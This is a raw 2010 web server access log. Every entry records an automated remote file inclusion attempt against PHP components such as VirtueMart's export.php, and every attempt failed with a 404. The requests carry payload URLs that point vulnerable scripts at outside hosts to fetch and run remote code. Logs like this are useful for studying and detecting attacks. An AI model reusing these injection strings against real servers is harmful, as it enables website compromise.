64.71.32.29 - - [02/Feb/2010:04:48:29 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:48:29 -0800] "GET /~t290/logs/access.log.0//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:50:58 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:50:58 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:50:58 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:51:05 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:51:05 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:51:05 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
74.54.22.2 - - [02/Feb/2010:04:53:06 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
74.54.22.2 - - [02/Feb/2010:04:53:06 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
74.54.22.2 - - [02/Feb/2010:04:53:06 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:53:45 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:53:45 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
64.71.32.29 - - [02/Feb/2010:04:53:45 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:12 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:12 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:12 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:18 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:18 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:18 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:31 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:31 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:31 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:39 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:39 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:56:39 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
74.54.22.2 - - [02/Feb/2010:04:56:58 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
74.54.22.2 - - [02/Feb/2010:04:56:58 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
74.54.22.2 - - [02/Feb/2010:04:56:58 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:10 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:10 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:10 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:10 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:11 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:15 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:15 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:15 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:17 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:17 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:17 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:19 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:20 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:20 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:20 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:57:34 -0800] "GET /~t290/logs/access.log//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:57:34 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:57:34 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:57:36 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:02 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:02 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:02 -0800] "GET /~t290/logs/access.log//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:03 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:03 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:03 -0800] "GET /~t290/logs/access.log//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:04 -0800] "GET /~t290/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 332 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:04 -0800] "GET /~t290//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 web.hypersurf.com
118.217.5.166 - - [02/Feb/2010:04:58:04 -0800] "GET /~t290/logs/access.log//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:58:18 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:58:21 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:58:21 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:58:21 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:58:23 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:58:25 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:58:33 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:04:59:21 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
219.240.36.36 - - [02/Feb/2010:05:02:00 -0800] "GET /~t290/logs//write_update.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 308 /home/users/t/t290/public_html/logs//write_update.php "-" "Mozilla/5.0" 0 web.hypersurf.com
219.240.36.36 - - [02/Feb/2010:05:02:00 -0800] "GET /~t290//write_update.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 303 /home/users/t/t290/public_html/write_update.php "-" "Mozilla/5.0" 0 web.hypersurf.com
219.240.36.36 - - [02/Feb/2010:05:02:00 -0800] "GET /~t290/logs/access.log//write_update.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:02:15 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:02:15 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:02:15 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:02:21 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:02:21 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:02:21 -0800] "GET /~t290/logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 355 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:03:07 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
219.240.36.36 - - [02/Feb/2010:05:10:23 -0800] "GET /~t290/logs/access.log.0//write_update.php?mosConfig_absolute_path=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 321 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:11:04 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
122.203.53.135 - - [02/Feb/2010:05:17:59 -0800] "GET /~t290//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
122.203.53.135 - - [02/Feb/2010:05:17:59 -0800] "GET /~t290/logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 web.hypersurf.com
122.203.53.135 - - [02/Feb/2010:05:18:00 -0800] "GET /~t290/logs/access.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:01 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:01 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:01 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:32 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:32 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:32 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:34 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:34 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:20:34 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:24:05 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:24:05 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:24:05 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:24:14 -0800] "GET /~t290//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 337 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:24:14 -0800] "GET /~t290/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
174.37.162.130 - - [02/Feb/2010:05:24:14 -0800] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
113.29.236.67 - - [02/Feb/2010:05:24:27 -0800] "GET /~t290/logs/access.log.0%20%20////?_SERVER%5BDOCUMENT_ROOT%5D=http://188.165.37.25/Nea/ftp/FxID1.txt?? HTTP/1.0" 404 297 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
